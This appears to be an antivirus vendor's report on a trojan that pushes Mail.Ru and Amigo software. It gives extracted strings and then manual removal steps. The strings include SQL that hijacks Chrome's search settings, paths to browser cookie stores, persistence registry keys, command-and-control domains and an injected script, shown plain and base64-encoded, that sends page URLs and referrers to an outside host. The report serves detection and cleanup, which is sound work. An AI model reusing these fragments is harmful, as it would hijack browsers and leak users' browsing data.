.?AV?$sp_counted_impl_p@Vconnection_data_string@downloader_impl@http@mailru@@@detail@boost@@
.?AV?$_Ref_count@V?$vector@V?$basic_resolver_entry@Vtcp@ip@asio@boost@@@ip@asio@boost@@V?$allocator@V?$basic_resolver_entry@Vtcp@ip@asio@boost@@@ip@asio@boost@@@std@@@std@@@tr1@std@@
.?AV?$service_base@V?$resolver_service@Vtcp@ip@asio@boost@@@ip@asio@boost@@@detail@asio@boost@@
.?AV?$service_base@V?$stream_socket_service@Vtcp@ip@asio@boost@@@asio@boost@@@detail@asio@boost@@
.?AV?$stream_socket_service@Vtcp@ip@asio@boost@@@asio@boost@@
.?AV?$resolver_service@Vtcp@ip@asio@boost@@@ip@asio@boost@@
.?AVconnection_data@downloader_impl@http@mailru@@
.?AVconnection_data_file@downloader_impl@http@mailru@@
.?AVconnection_data_string@downloader_impl@http@mailru@@
zcÁ
{-J};
URlW
vN.VP
I.nue
%XXJ}<
B$.sU
=.agDf
w3u.xZ
\'.xJ
K:\Q$
=B.pU
%X%EQ
?.Ijd;8
H.sHrpdg
.cb2'
.yAyx
}0%f.
$.fK^&
>upe.qr
|.lPs
Vq.Lv
.sE5oP
%S"s\lUrJ
f.zYy
}A.glq
8%FV)%
u3%.ziE
/O8jg 
4R.sDgU
.CyE3x
$*3%x
.Lew8
3?n.WW 
H.TO`
yi?.jDH
JW.oKq
%XsZj
o.Vq%
Bg/.Oa$}P
.yc-"
l.jhV
.jDoA
.qt~u\F
%4xz4v
.qJvO
}.kd.Q
tJ.Yf
.eE9q
V.Np4Y
*A%U.
:G/F%cNJ
59.Op
=7%u!r
\.dtQ
r%c/W
| %uF
.ien&m
jcrt{
Ø?@
.GAT9v
s9û32@
|!.eYp
{D%2s
%Dw5L
%|.tV
xR%CJ
*c.qT
d]T.po
.jQ|D
V3Okey;v
7{T]%D
i&U%U
v%XE$
.Iqy1W
4.TqP`
)cm!%f
H.ia%
.TKyUY
=-%CW%iG
2];*'9\:
/,I.Iq
".DWLp@
YVŒ
JE.kKt
nM.oH
.Bo1(
'.HD(x
È~Cq
q.Bu2
SW.rM
Rj3R%urOY
sIzMsGV
=J.Zd.
iu%s<8
j"%uxgh
.sIl6
8%f&Q
= .yu
tI.DE
I-.CIpU
FZ%x8
D(.WAg#*
{XK~%cxR
%cRVJ
.dSRN
1%F.X
H.kMp
9.oJWE[
.Ke{"
%F:!e
6%fL)
X{#L%uVk>.
P,%FY
UÆ3
7|kMo-3}
W.ym25
.sm)0.
FJ.dn
nmX.LL
C.UT^
|}[.IW
A.TZ,mC
TPR.qiHwDf
tl.Qa`
gp.WsN
{r.Gq
$%F//b
c %C=
[.vxFx
.Uw~c
%uI95d
9-x}0
Ze.qH
45;%D
%fZB7TCG"
`%x'y)Z
.LvC5
;%xsA
83.Tx
Th.ku 3
Y|.yH
X`.WFq}
cMda
%fi@~
)xw.yM
x^n%Cu
D1.et
N.hjY
)l)215{%c
.te4 |
.Mf8pV
[0.kC
A'.TV
;,.Iz
pry.iS
=6.ve
.mb:k
K.wU*C
f.zQb
%u#d^
I]k.ii
gV%D)Q
&%fQ[
p.btw
:8Hs.vj
.QLjPEX6
`\%s.
ü#|N
%CRlx
,<J%x
D?T.ow
A=%SfW.L
%/2'$: .
>.XZ:
nc|%c
/ %ds
o.EcR
.zKGr"
Y6K%Uj
0j}=.Jl
Y(|M.RM
.dO^Pi
OF%cV[
.ejZU
Cf .Qf
[KZ`%Cq
`.xO582?,z2?
%f|y;
r\B%d
/.NB'
%s-s@i
fC.tp@
Ftpy
%s)='
J.nl`5F
-l}n9@
%Uk^*
n7.qKEX
.CaB]
O;%X$
Q.DGE
.MwUI%,.
w%F M
r3>N.sG
.bzMZ
@M%Uf
^G|B-O8}
x.gW}~
xp#.gk
.WhS E
=|%xV
Hw.Vf)
i.DI#{%9
l.Jl`
7{%U@
.w%%D
S%u2$BU
>s/%D
%7x)eI
CF%UdX
,%Xu\
U;Öq
;N.Sg
b6X.XZ
DL.tT
Z%Uv]
.fx/i
W3.fOq
0.GvGJ
>0.rO
wD.UG
-.bKI"
hdl90%Sf
-5}u1zQ>
m.-Y}e
%xadmkoY
G.Qy,
.rSt7
I.mb`vp
!A'&k.jU
PÊG*|
%XBDw
N,
[d.sym
.Hpxp
.Yg`&x
.jzO'
/TX.eQ
Ja.ffu
.Saq#
@o%s$R
.pDL]cP
Qa%S*
%sTVC
.Rphi
&Urlg`
5fY;.Sj
.sg~=
%fi!T
8%si7
%vY.Wk
V%FPRG
%xk_/N
w9Z?.XZ0
?2b.Gi
>.pK 
%xS1V
*%uPZiv
.ci$P
,/.QU
1C.uwN!
#q%d>
$UExe
C.zH7
(.vqM
.kB B"_
%F^Qr
:<TCP!
.kWhw
1>4g,%c
.IGix
ß(N
w.AKF
{ %F{
-S&Ó
.wKL)
}c/z#Kx%u
(O^%S
"MkG.mL
bi.Mkp
CRTE
N z.Wt![
%S:]%8
&%dgP
Q%uI%
dZ.esgh
F).Ve4
<%c 2!
q.aH{
R?.ld
']0 .Nj
.yLY[,
`u.gL
ShellExecuteW
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
2(2.272>2`2
>=<6332-
?:97410"
;85&%$#!
/* 231'9:;
D.jn#k
üc5tFV
LLC Mail.Ru1
LLC Mail.Ru0
*hXXp://cs-g2-crl.thawte.com/ThawteCSG2.crl0
hXXp://ocsp.thawte.com0
Certification Services Division1806
#hXXp://crl.thawte.com/ThawtePCA.crl0
hXXp://ts-ocsp.ws.symantec.com07
 hXXp://ts-aia.ws.symantec.com/tss-ca-g2.cer0<
 hXXp://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Thawte Certification1
.hXXp://crl.thawte.com/ThawteTimestampingCA.crl0
<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity>
;&<,<3<:<
:):/:6:=:
8#9(909>9
1'1,111|1
0 1$1(1,1
8{90:4:8:<:
0%1/161<1
3)3/363=3^3
7&767&868
9Ÿ:x:f<x<
9!939&:8:
;";*;;;];
1 1%1-1>1|1
4 4$4(4,4044484
>4?8?<?@?
;&; ;1;5;@;
0#1(141>1
5(6,6064686<6
8Ÿ9u9
8&8 818=8
01F1m1
5%6U6
6 6$6(6,6(7,70747
5 5$5(5,5054585<5@5
? ?(?0?<?`?
1,181@1\1|1
0(040<0\0
6,686@6`6
1 1$1(1,101`5
manifest.json
URLS
Advapi32.dll
Fsqlite3_reset
Asqlite3_bind_text16
@sqlite3_exec
version.txt
UPDATE ItemTable SET value = ? WHERE key = ?
Local Storage/chrome-extension_jaocgokledfmfebefgbeokdodbbdjhdd_0.localstorage
Web Data
Google/Chrome/Application/chrome.exe
p1.0.15_0
res:\\BIN\IDR_CHROME_MAILTABS
%SUGGEST_URL%
UPDATE keywords SET suggest_url = '%SUGGEST_URL%' WHERE keyword like '%mail.ru%'
Software/Microsoft/Windows/CurrentVersion/Run
update.exe
WHERE key='Default Search Provider ID'
Software/Microsoft/Windows/CurrentVersion/Uninstall
Google/Chrome/User Data/Default
Google Chrome
e_locales/%1%/messages.json
__MSG_
chrome-extension://%1%/%2%
select k.url from meta m, keywords k where m.key='Default Search Provider ID' and m.value=k.id
select value from meta where key='Default Search Provider ID'
select url from keywords where id = %1%
ALTER TABLE keywords ADD COLUMN search_terms_replacement_key VARCHAR DEFAULT ''
ALTER TABLE keywords ADD COLUMN alternate_urls VARCHAR DEFAULT ''
SELECT * FROM keywords
DELETE FROM keywords WHERE short_name = '@MAIL.RU'
SELECT id FROM keywords WHERE keyword = 'mail.ru' COLLATE NOCASE
' WHERE key = 'Default Search Provider ID Backup'
' WHERE key = 'Default Search Provider ID'
SELECT id, prepopulate_id FROM keywords
SELECT id , prepopulate_id FROM keywords WHERE keyword = 'mail.ru' COLLATE NOCASE
SELECT id , prepopulate_id FROM keywords WHERE keyword = 'go.mail.ru' COLLATE NOCASE
UPDATE keywords SET short_name = '
@Mail.Ru', keyword = 'go.mail.ru', favicon_url = 'hXXp://go.mail.ru/favicon.ico', url = 'hXXp://go.mail.ru/search?q={searchTerms}&fr=chrome',show_in_default_list = '1' WHERE id = '%ID%'
@Mail.Ru','go.mail.ru','hXXp://go.mail.ru/favicon.ico','hXXp://go.mail.ru/search?q={searchTerms}&fr=chrome',1,1,'',1333701777,0,'windows-1251','hXXp://suggests.go.mail.ru/ff3?q={searchTerms}',%PREPOPULATE_ID%,0,'',0,'03095DE3-A6E7-4793-A20C-399A0F4A92E1'
SELECT id , prepopulate_id FROM keywords WHERE keyword = 'search.icq.com' COLLATE NOCASE
UPDATE keywords SET short_name = '[email protected]', keyword = 'search.icq.com', favicon_url = 'hXXp://search.icq.com/favicon.ico', url = 'hXXp://search.icq.com/search/results.php?q={searchTerms}&ch_id=hm&search_mode=web' WHERE id = '%ID%'
%ID%,'[email protected]','search.icq.com','hXXp://search.icq.com/favicon.ico','hXXp://search.icq.com/search/results.php?q={searchTerms}&ch_id=hm&search_mode=web',1,1,'',1333701777,0,'windows-1251','',%PREPOPULATE_ID%,0,'',0,'03095DE3-A6E7-4793-A20C-399A0F4A92E1'
id, short_name, keyword, favicon_url, url, show_in_default_list, safe_for_autoreplace, originating_url, date_created, usage_count, input_encodings, suggest_url, prepopulate_id, created_by_policy, instant_url, last_modified, sync_guid
INSERT INTO keywords
SELECT value FROM meta WHERE key = 'version'
select * from keywords
keywords
chrome.exe
No go.mail.ru in chromium
select id, short_name from keywords where url like '%go.mail.ru%' COLLATE NOCASE
. url =
)Software/Mail.Ru/IE_Bar
Software/AppDataLow/Software/Mail.Ru/IE_Bar
Software/Mail.Ru/Updater
SOFTWARE/Microsoft/Windows/CurrentVersion/Uninstall
SOFTWARE/Mail.Ru
{09900DE8-1DCA-443F-9243-26FF581438AF}
{58810E75-E249-44C6-B989-11D227263E24}
{91397D20-1446-11D4-8AF4-0040CA1127B6}
{95289393-33EA-4F8D-B952-483415B9C955}
hXXp://mrb.mail.ru/update/2/
hXXp://VVV.mail.ru/cnt/7227
hXXp://go.mail.ru/search?utf8in=1&fr=ietb&q={SearchTerms}
hXXp://suggests.go.mail.ru/ie8?q={SearchTerms}
{FFEBBF0A-C22C-4172-89FF-45215A135AC7}
Mail.Ru
iexplore.exe
{37964A3C-4EE8-47b1-8321-34DE2C39BA4D}
=firefox.exe
opera.exe
SOFTWARE/Google/Chrome/Extensions
amigo.exe
nichrome.exe
browser.exe
Software/Mail.Ru/ChromeInstaller
Software/Mail.Ru/mTorrent
F777C640-57F8-4ECE-A40B-F571D25C2EFE
opera
firefox
google chrome
Software/Microsoft/Windows/CurrentVersion/Uninstall/Amigo
Software/Microsoft/Windows/CurrentVersion/Uninstall/xpom
xpom.exe
Software/Microsoft/Windows/CurrentVersion/Uninstall/YandexBrowser
Software/Microsoft/Windows/CurrentVersion/Uninstall/{1B89BC31-F539-4EBD-B94F-C24705C73433}
Software/Microsoft/Windows/CurrentVersion/Uninstall/Xpom
SOFTWARE/Microsoft/Windows/CurrentVersion/Uninstall/Bromium
SOFTWARE/Microsoft/Windows/CurrentVersion/Uninstall/Google Chrome
.html
go_internet.exe
launcher.exe
google.com
google.ru
livesearch.me
webssearches
istart.webssearches.com
conduit.com
webalta
url_argument
hXXp://go.mail.ru/?sct=1
odnoklassniki.ru
Microsoft/Windows/
Microsoft/Windows/Start Menu
Software/Mail.Ru/Guard
C.delay
DidChromeRollBack3
Software\Mail.Ru\Guard
1.0.0.545
Mail.Ru/Guard/GuardMailRu.exe
rMailRuUpdater.exe
Mail.Ru/MailRuUpdater.exe
delete from keywords
UPDATE keywords SET show_in_default_list = '1' WHERE keyword like '%mail.ru%'
suggests.go.mail.ru
go.mail.ru/search
hXXp://go.mail.ru/search?q={searchTerms}&fr=mrch&fr3=
Software\Mail.Ru\ChromeInstaller
(.*yandex\.ru. clid.*|.*soft.yandex.*)
SELECT * FROM ItemTable where key like '%url%'
Xpom/Application/chrome.exe
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
hXXp://binupdate.mail.ru/amigo/version2.xml
hXXp://binupdate.mail.ru/chrome/version3.xml
hXXp://binupdate.mail.ru/chrome/version2.xml
hXXp://binupdate.mail.ru/chrome/internet_to_amigo.xml
hXXp://binupdate.mail.ru/updater/version.xml
0.0.0.0
28.0.1501.430
p.old
Amigo/Application/amigo.exe
Google/Chrome/Application
BGoogle/Chrome/User Data
{ADAC3638-040C-498C-845A-F89B99705444}
Software\Mail.Ru\Tech
{21597994-E705-43D1-8D43-B1C117E16710}
SELECT last_visit_time FROM urls order by last_visit_time DESC LIMIT 1
amsg
ISQLite error %1% returned by %2%
SQLite error code %1%, file %2%
sqlite3_prepare16_v2
sqlite3_step
sqlite3
sAbsolutePath: <%s>
%1% (%2%)
HTTP code %1%
Software/Microsoft/Windows/CurrentVersion/Explorer/Shell Folders
0123456789 ,.
\StringFileInfo\xx
notepad.exe
Internet Explorer/iexplore.exe
SOFTWARE/Microsoft/Windows/CurrentVersion/Policies/System
Invalid url
888816666554443
6666554443
!6666554443
SKERNEL32.DLL
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
mscoree.dll
WUSER32.DLL
%Documents and Settings%\%current user%\Local Settings\Application Data\Mail.Ru\MailRuUpdater.exe
IDR_CHROME_MAILTABS
\Amigo\Application\amigo.exe
KERNEL32.DLL
Mail.Ru updater
1.0.7.11
MailRuUpdater.exe

Explorer.EXE_1572_rwx_00ED0000_00019000:




.text
`.rdata
@.data
.reloc
t.exf
sx.ef
ap.ef
vc.ef
32.df
SSSSh@
sqli
UrlA
3.exf
SShp@
2.exf
d.baf
YSSSh
o.exf
me.ef
a.exf
rd.ef
HTTP/1.1 200 OK
Content-Length: %d
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0
Host: metrika.yandex.ru
HTTP/1.1
%c%c%c%c%c
Content-Type: application/x-www-form-urlencoded
Host: metrika.yandex.ru
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
InternetCanonicalizeUrlA
HttpSendRequestA
HttpAddRequestHeadersA
HttpOpenRequestA
InternetOpenUrlA
wininet.dll
\Opera Software\Opera Stable\Cookies
\cookies.sqlite
\Mozilla\Firefox\Profiles\*
\Google\Chrome\User Data\Default\Cookies
( host_key not like '%
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
sqlite3_exec
sqlite3_close
sqlite3_open
User-Agent: Test Agent 23.0.1
mshtml.dll
dom.disable_open_during_load
opera.exe
opera.dll
browser.dll
Expires: %s, d %s d 23:59:59 GMT
HTTP/1.1 404
ws2_32.dll
Software\Microsoft\Windows\CurrentVersion\Run
Kernel32.dll
hXXp://
default.cfg
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
time=%d
dw%d=%s
chance=%d
script=%s
%s=%s
speed=%d
dwLow=%d
dwHigh=%d
Period=%d
sfi=%s
sfr=%s
%d=%s
[EXE]
sqlite3.dll
ver="%s"
[DASEXE]
vm="%d"
os="%d.%d.d.%d"
pa="%d"
av="%d"
kernel32.dll
WS2_32.dll
SHLWAPI.dll
GetProcessHeap
GetWindowsDirectoryA
KERNEL32.dll
USER32.dll
GDI32.dll
RegCloseKey
RegOpenKeyExA
ADVAPI32.dll
ShellExecuteExA
SHELL32.dll
0="gabport.com"
1="vertigang.com"
2="gigacircuit.com"
3="driveexpo.com"
4="goog1asco.com"
amg="/amigodl.php?i=33"
sfr="/history.php"
sfi="ZG9jdW1lbnQud3JpdGUoJzxzY3JpcHQgc3JjPSJodHRwOi8vZ29vZzJlc3RhdC5pbi9iLnBocD9wPScrDQogICAgICAgIGVuY29kZVVSSUNvbXBvbmVudCgiQENSQEBJREB8QFNJREBAQ1JAIikrJyZxPScNCiAgICAgICAgK2VzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrJyZ1PScrZXNjYXBlKGRvY3VtZW50LlVSTCkNCiAgICAgICAgICAgICsnPycrTWF0aC5yYW5kb20oKSsnIj4nK3VuZXNjYXBlKCIlM0Mvc2NyaXB0JTNFIikpOw=="
{|`g3-3}f
sid="%s"
(window.goog1eads = function(){
if (document && document.body)
var script = document.createElement('script');
script.src = '//goog3estat.in/b.php?p=' encodeURIComponent("@CR@@ID@|@SID@@CR@") '&q=' escape(document.referrer) '&f=' f '&u=' escape(location.href) '&' ( new Date);
script.async = true;
document.body.insertBefore(script, document.body.firstChild);
setTimeout(window.goog1eads, 300);
6.00.2900.5512
doubleclick.net
4zw.pw/dblckne?
cinemaloadss.com
4zw.pw/cinemalo?
perience.live.com
.4zw.pw/skywebex?
aredaddomain.com
.4zw.pw/sharedo?
tgearheads.com
4zw.pw/tgearh?
rame.tvzavr.ru
.4zw.pw/tvzav?
syndication.exoclick.com
4zw.pw/tion.exoclick1co?
ads.searchplus.ru
4zw.pw/rchplus1r?
cssrucdn.com
4zw.pw/rucd?
adforce.vkwinamp.ru
4zw.pw/vvkwinamp1r?
%original file name%.exe
hXXp://gabport.com/amigodl.php?i=33
{E1070104-F404-44CE-B556-0622F9D63EE5} mac=000C298A8B37
<script>(window.goog1eads = function(){
%Documents and Settings%\%current user%\My Documents\CommonData\
;)<3<?<_<






Remove it with Ad-Aware




    

  1. Click (here) to download and install Ad-Aware Free Antivirus.
    2. 

  2. Update the definition files.
    3. 

  3. Run a full scan of your computer.
    4. 





Manual removal*




    

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):
    

    mailruhomesearch.exe:656
    dwwin.exe:1300
    amigo.exe:488
    MailRuUpdater.exe:820
    MailRuUpdater.exe:1772
    AmigoDistrib.exe:324
    r45215.exe:884
    Winhlp313.exe:1944
    %original file name%.exe:1756
    setup.exe:1968
    

    2. 

  2. Delete the original Trojan file.
    3. 

  3. Delete or disinfect the following files created/modified by the Trojan:
    

    %Documents and Settings%\All Users\Favorites\Mail.Ru Агент - используй для общения!.url (210 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Mail.Ru\GoMailRu.ico (16428 bytes)
    %Documents and Settings%\All Users\Favorites\Mail.Ru.url (152 bytes)
    %Documents and Settings%\%current user%\Desktop\Искать в Интернете.url (209 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Mail.Ru.lnk (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Mail.Ru\Sputnik\MailRu.ico (196 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Mail.Ru.lnk (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\8FEEA.dmp (99830 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\debug.log (165 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\User Data\1.tmp (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\User Data\2.tmp (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Mail.Ru\MailRuUpdater.exe (46100 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\fcf4_appcompat.txt (3002 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\CR_FA880.tmp\SETUP.EX_ (1696 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\CR_FA880.tmp\setup.exe (18208 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\CR_FA880.tmp\CHROME.PACKED.7Z (373523 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\mailruhomesearch.exe.xdl! (50143 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\AmigoDistrib.exe.xdl! (382822 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\456FK5AF\mailruhomesearch[1].exe (50143 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\456FK5AF\AmigoDistrib[1].exe (382822 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\r45215.exe (76 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\My Documents\CommonData\Winhlp313.exe (110080 bytes)
    %Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SPA30XYZ\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\K5YV8XYR\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\456FK5AF\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\busy (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\41U7GHIN\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\mr.dll (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\lv.pak (234 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\ro.dll (10 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Вконтакте.lnk (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\am.pak (323 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\mailruupdater.exe (45823 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\master_preferences (982 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\pl.dll (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\vk.exe (167 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\zh-CN.dll (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\id.dll (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\da.pak (213 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\ms.pak (214 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\bn.pak (1769 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\et.dll (10 bytes)
    %Documents and Settings%\%current user%\Desktop\Amigo.lnk (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\ja.pak (282 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\ms.dll (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\fa.pak (1611 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\Одноклассники.lnk (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\cs.pak (234 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\es.dll (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\uk.pak (1648 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\ca.dll (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\ppgooglenaclpluginchrome.dll (1747 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\lt.dll (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\el.pak (1699 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\nl.pak (226 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\Вконтакте.lnk (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\hi.dll (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\nb.pak (213 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\VisualElements\splash-620x300.png (35 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Amigo.lnk (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\gcswf32.dll (100429 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\sv.dll (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\ar.dll (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\ok.exe (673 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\chrome_frame_helper.dll (57 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\sw.pak (215 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\zh-CN.pak (192 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\chrome_100_percent.pak (5442 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\vk.exe (673 bytes)
    %Documents and Settings%\%current user%\Desktop\Вконтакте.lnk (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\he.pak (266 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\VisualElements\smalllogo.png (14 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\Amigo.lnk (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\ar.pak (314 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\ru.pak (1642 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\delegate_execute.exe (9606 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\chrome_installer.log (972 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\ru.dll (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\uk.dll (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\ja.dll (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\d3dcompiler_46.dll (22433 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\ml.pak (3679 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\wow_helper.exe (73 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\chrome.exe (5442 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\gu.dll (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\hu.dll (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\libegl.dll (109 bytes)
